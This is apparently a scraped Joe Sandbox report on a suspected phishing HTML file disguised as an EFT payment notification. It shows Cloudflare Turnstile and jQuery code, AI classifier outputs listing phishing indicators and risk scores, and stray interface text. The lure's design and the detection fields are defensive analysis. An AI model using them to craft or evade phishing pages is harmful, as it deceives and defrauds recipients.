chlApiSitekey: '0x4AAAAAAA4pnGQDZ108QgTx',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: 'xuShyzJK5Wr28Qbx2mMjEaNghFaE65MbdLxiRutg9Dg-1736876457-1.3.1.1-rbgxGBgS3J9bsasz3ltrKaJm3ZTyot5O.kCCXhS0G4U',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '901f6a04794f4313',
cH: '7mj93atMyblfS0PxSutmR1.jhZ9HJJhlI.j6f69YuQ8-1736876457-1.1.1.1-9AFWrYYgbKxWYqBfzkgK8H3AegMSmL4WE4J__jFGXvL8kv8DPeh90bCKctdvYlGT',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
md: 'BYyolmDur5n2TD9r2QeHSiM0LfGXC0yCu8rstjD8bAo-1736876457-1.1.1.1-k1bjwb7P9POBiL37juxULWK4YdkSPoj_L3_hQqICXRNHfqhWlTHpsSKbGH7FReQXtvtZT40e.f3ucqvanKm1P50K41t0GQJGYY9kPqAVJvCyBb01yKxvAejKaLP5_8MVaXQPxvQBhxkhdaWg2kSSC1rKcf3LLW2TNZMfc8Gswk0OPdxLP_m3f2X53cDIE7EvSHy6mwwffqB12U2fXqslQB6BkmzgEA4COkf9eqeiUe3jQiKqbvrNe_L0Yn3shSnhcKI0V8xNu9VyjINpIUF2n_z0jOwnLQrktvQZFGbm0YGDzfZSelUSWXOGD9EQNzqCt9NoE8.rauaPq3kjX2Wg2DIqfsI9gOP2zyBACTnOrRmSPLbUTQX8Or48x5grF5TUYqZdYVJOdL9hRS7jRYf0ZeRp9d10AUuctv65mNCNGIA0H8VUSWQ263bKGwvypIbBgIimCrTSARfzXRFHzjTKqQWzZdFqlX23AK2Q_e1yXuIeZg3lfrtebTz1fXsJIi7lATBqKr7ulsRrZAVqAe15wzfQsGNarlq0cTnAnwqUZDow8gZhmFip_5UC_k.yd3utJEGjWgE_MSutnJ5qWVfnyEUXgCroRbpASVLQRacfCZ3_FB.3b6cdMi7gEIv5hdtLwvL9acoI0hYbQ.7dAl63UYN5PSZ.1hCHzLvQQGMm3KXur4bMHG9NjKg4HJIRnFbCvy3ifuKDn_3k8m4k7P25sXmJY69lFbhfQUhhuvj60lD0P.3I0kQqtUiK4tSiqLTTF.XtNS.6enqpUXn9BaBvZeq0DJ06xo82u3kDUsz3BEaK68T8rkCnhT05wcJ7gL2rFy.JLEq5RPxTeieYegrEaJsmcDx1MDq5f50pbdjwzA8yKUVQryMXPEeiBEeNpw54kaRAwElgbTJOy1gHt251wsRPXHuPyik8pgyxJEZ110.aCSnl8NzsZckoE1ZBI60zl2sEQAu.zxgA8nWMHbbb8LcPIebL.xuT19NtAItYzeVBnrddLEvyi.hdLM8TFfcI46UTm7iEPFHKaOmLqwyKxE0YvRCB4iaROGZfxzpAMNdMBQs70a2gjJYVzXtxphuea5_ANlWWGTmfa11_G0ZtmX1d4ngMwBnkaSvYIdB7hMwE9WWtIKXebw5r_WaYlfeUhz9VFmK73Fyw2UdcrbclQ0To5c_d2ihsbBYfY0_35tRYSWxHrt6.GsJg2hNQ1n.MlcrbVRySDKB1GZplE.q4CpBVMOq_UCmItA_wzYG.yvypxLQu0aWurfBjtIzvANthy5sG3LNdefTOY8LiYWmR1DDAoP0ZPXE53f2PNRO0O0y7_rkjpBEca2cnqjXs0O6Fj.nDAeF.zQ0NC5BPqCI4IqDcepPf6tj8_tNnofqO19c',
cITimeS: '1736876457',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'xanv7',
nextRcV: 'xuShyzJK5Wr28Qbx2mMjEaNghFaE65MbdLxiRutg9Dg-1736876457-1.3.1.1-rbgxGBgS3J9bsasz3ltrKaJm3ZTyot5O.kCCXhS0G4U',
event: 'reloadRequest',
}, "*");
}
}
};
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
window.addEventListener('message', handler);
}());
|
| URL: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29t Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying...",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29t Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying...",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
| URL: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29t Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying...",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
| URL: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29t Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29t Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29t Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: https://challenges.cloudflare.com/turnstile/v0/b/e... Model: Joe Sandbox AI | ```json
{
"risk_score": 1,
"reasoning": "The script contains no high-risk or moderate-risk indicators. It appears to be a utility script with no signs of malicious behavior, such as dynamic code execution or data exfiltration. The code is not obfuscated, and there are no interactions with external domains. It seems to be a benign script, possibly part of a larger application."
} |
"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Ar(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function Bt(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function qt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return o}function zt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Gt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
| URL: :// Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: :// |
| URL: https://code.jquery.com/jquery-3.6.0.min.js... Model: Joe Sandbox AI | ```json
{
"risk_score": 1,
"reasoning": "The provided JavaScript snippet is a part of the jQuery library, which is a widely used and reputable open-source library for DOM manipulation and event handling. The code does not exhibit any high-risk or moderate-risk behaviors such as dynamic code execution, data exfiltration, or redirects to suspicious domains. It primarily consists of utility functions and prototype extensions typical of a library. There are no interactions with external domains or obfuscated code present. Therefore, it is considered low risk."
} |
/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.6.0",S=function(e,t){return new S.fn.init(e,t)};function p(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}S.fn=S.prototype={jquery:f,constructor:S,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:u,sort:t.sort,splice:t.splice},S.extend=S.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||m(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(S.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||S.isPlainObject(n)?n:{},i=!1,a[t]=S.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},S.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(p(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t||[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(p(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&a.push(i);return g(a)},guid:1,support:y}),"function"==typeof Symbol&&(S.fn[Symbol.iterator]=t[Symbol.iterator]),S.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var d=function(n){var e,d,b,o,i,h,f,g,w,u,l,T,C,a,E,v,s,c,y,S="s |
| URL: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29t Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Running security checks to validate your browser.",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29t Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Running security checks to validate your browser.",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
| URL: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29t Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29t Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
Edit tour
chrome.exe (PID: 6276 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node